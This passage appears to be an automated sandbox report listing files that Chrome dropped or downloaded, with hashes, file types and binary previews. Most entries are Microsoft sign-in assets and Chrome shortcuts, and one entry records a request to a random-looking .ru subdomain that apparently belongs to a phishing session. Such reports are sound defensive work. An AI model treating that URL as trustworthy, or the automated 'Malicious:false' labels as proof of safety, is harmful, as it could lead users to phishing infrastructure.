                                                                      Entropy (8bit):4.006150138978499
                                                                      Encrypted:false
                                                                      SSDEEP:48:8Bd0T4AAHRidAKZdA14meh7sFiZUkmgqeh7sBy+BX:8QvEn/y
                                                                      MD5:AA2E8C3389352C49D42E3A2C96F99FB7
                                                                      SHA1:7A7A193B74DD1F8A1295D9766841AC816363BDE4
                                                                      SHA-256:35A3CD6B5E81684ACB1146B467678D3C2D0DA5E7123220BF39D7C6999A0F948D
                                                                      SHA-512:0A1C07C734CF493DD44BEA68751D53D3E133AB6F0E39AFE6B49C10DC5FB5B33FAEBFD8AE673D93E3435E6F46EDC9245C5D13351BD271772A5FF5D133B080CDC8
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZUC....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'ZaC....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'ZaC....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'ZaC..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 07:27:03 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):2677
                                                                      Entropy (8bit):3.998562382466715
                                                                      Encrypted:false
                                                                      SSDEEP:48:8Hd0T4AjHRidAKZdA1TehDiZUkwqehny+R:8KvCpy
                                                                      MD5:0D3E058A9D5F98D4C645F2CF371F22FA
                                                                      SHA1:C4905C1CD3CD6A479F51D14F3D4B79894EEE9367
                                                                      SHA-256:D4BB6F0DF6483B16249A1CA6B9D75365071A2D1EF40A3F0B85A7D3F08E20D854
                                                                      SHA-512:501A4A84CC47057FFA2B7D76FFEE477570F021890A8B9F22A1BAB4B942CCCB9EF340B9CE3189D42B38B62304A93383A7A97D78DDF9E234C2300F3D38A6ADBBC1
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:L..................F.@.. ...$+.,........`..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZUC....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'ZaC....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'ZaC....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'ZaC..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'ZbC...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 07:27:03 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):2677
                                                                      Entropy (8bit):3.9869354024538333
                                                                      Encrypted:false
                                                                      SSDEEP:48:8Hd0T4AjHRidAKZdA1dehBiZUk1W1qehVy+C:8KvS91y
                                                                      MD5:10980C05F612C75EF1A6200D9DB83EB5
                                                                      SHA1:ED3FF1E2B09F0ECF97CCECCA3C7AE0E5C4BA75F0
                                                                      SHA-256:330F9EDFA77A0C97EF5E8AC6BDDA317C6F9BA2AA7602B5B49AE06DDD1DAC96A7
                                                                      SHA-512:2B81B6C64ABFA082356B71C38EC318C0077AF7478BE3AFB527B1CE3B3AD64A2CA0DA3EF819D7B11587E77DF06C56D3245343BA57A6E272393159068DDEB2B3FC
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:L..................F.@.. ...$+.,.....F...`..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZUC....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'ZaC....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'ZaC....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'ZaC..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'ZbC...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 07:27:02 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):2679
                                                                      Entropy (8bit):3.9957984364710333
                                                                      Encrypted:false
                                                                      SSDEEP:48:8Jd0T4AjHRidAKZdA1duTeehOuTbbiZUk5OjqehOuTb/y+yT+:84vITfTbxWOvTb/y7T
                                                                      MD5:080505A92AB328D938F9FB5F7713EA02
                                                                      SHA1:9BC0E958945FDB422AB2CC967E9CC189F9A3772A
                                                                      SHA-256:AD8E223337D7AC4DE367F9E000A5B85165468141181F4BCE2D422209CE401223
                                                                      SHA-512:22D86CACA0B4553CB1E0816AFA94A2C1FDFDF8684D103486BE3DA82CA5EEA011C4B29A934711B12713E33551304BEDBB5AAC35BD264454ED643EDB4B45671ECF
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:L..................F.@.. ...$+.,....g...`..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZUC....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'ZaC....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'ZaC....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'ZaC..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'ZbC...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........v........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (65447)
                                                                      Category:downloaded
                                                                      Size (bytes):89501
                                                                      Entropy (8bit):5.289893677458563
                                                                      Encrypted:false
                                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                      Category:downloaded
                                                                      Size (bytes):621
                                                                      Entropy (8bit):7.673946009263606
                                                                      Encrypted:false
                                                                      SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                      MD5:4761405717E938D7E7400BB15715DB1E
                                                                      SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                      SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                      SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                      Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                      Category:dropped
                                                                      Size (bytes):122515
                                                                      Entropy (8bit):7.997419459076181
                                                                      Encrypted:true
                                                                      SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                      MD5:AC9A6ED508328361A4C9530325A94076
                                                                      SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                      SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                      SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                      Category:downloaded
                                                                      Size (bytes):49911
                                                                      Entropy (8bit):7.994516776763163
                                                                      Encrypted:true
                                                                      SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                      MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                      SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                      SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                      SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                      Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):72
                                                                      Entropy (8bit):4.241202481433726
                                                                      Encrypted:false
                                                                      SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                      MD5:9E576E34B18E986347909C29AE6A82C6
                                                                      SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                      SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                      SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                      Category:downloaded
                                                                      Size (bytes):5525
                                                                      Entropy (8bit):7.961202222662501
                                                                      Encrypted:false
                                                                      SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                      MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                      SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                      SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                      SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                      Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):96
                                                                      Entropy (8bit):5.220277803943091
                                                                      Encrypted:false
                                                                      SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWLsnk:NciczBdTFsJFoM+q6Mk
                                                                      MD5:46520767C8D53BEFDB7688E66411794F
                                                                      SHA1:964DB4925CE2A3D3C74329F9E7DE422EAB1CB4C0
                                                                      SHA-256:2A3BB51F716E053996B41395A6E2F4F49419754C324C02C6693BAFD449867E3D
                                                                      SHA-512:59ED863313B71B668AC6A6516162A07AC01F1E882747171F555592DE64B2D0DEB8A9CFA29BF014A1D23147D760EA573295A9C4E829BA6AF3708CC3BE3B78CF19
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                      Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O34nPCJcXRABGP////8P
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                      Category:dropped
                                                                      Size (bytes):621
                                                                      Entropy (8bit):7.673946009263606
                                                                      Encrypted:false
                                                                      SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                      MD5:4761405717E938D7E7400BB15715DB1E
                                                                      SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                      SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                      SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:GIF image data, version 89a, 352 x 3
                                                                      Category:dropped
                                                                      Size (bytes):3620
                                                                      Entropy (8bit):6.867828878374734
                                                                      Encrypted:false
                                                                      SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                      MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                      SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                      SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                      SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:downloaded
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru/ItjnOrQFuqAwfUMRPcpijOHMGRTPXRGRZFXLIWPJUHDRHTAXAFCEEPIPRAIGIVWFSPLFFYUPBMOFHWRLVOOE
                                                                      Preview:1
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                      Category:dropped
                                                                      Size (bytes):35170
                                                                      Entropy (8bit):7.993096534744333
                                                                      Encrypted:true
                                                                      SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                      MD5:171A4DD9400708B88724B57D62B24A6A
                                                                      SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                      SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                      SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                      Category:downloaded
                                                                      Size (bytes):17174
                                                                      Entropy (8bit):2.9129715116732746
                                                                      Encrypted:false
                                                                      SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
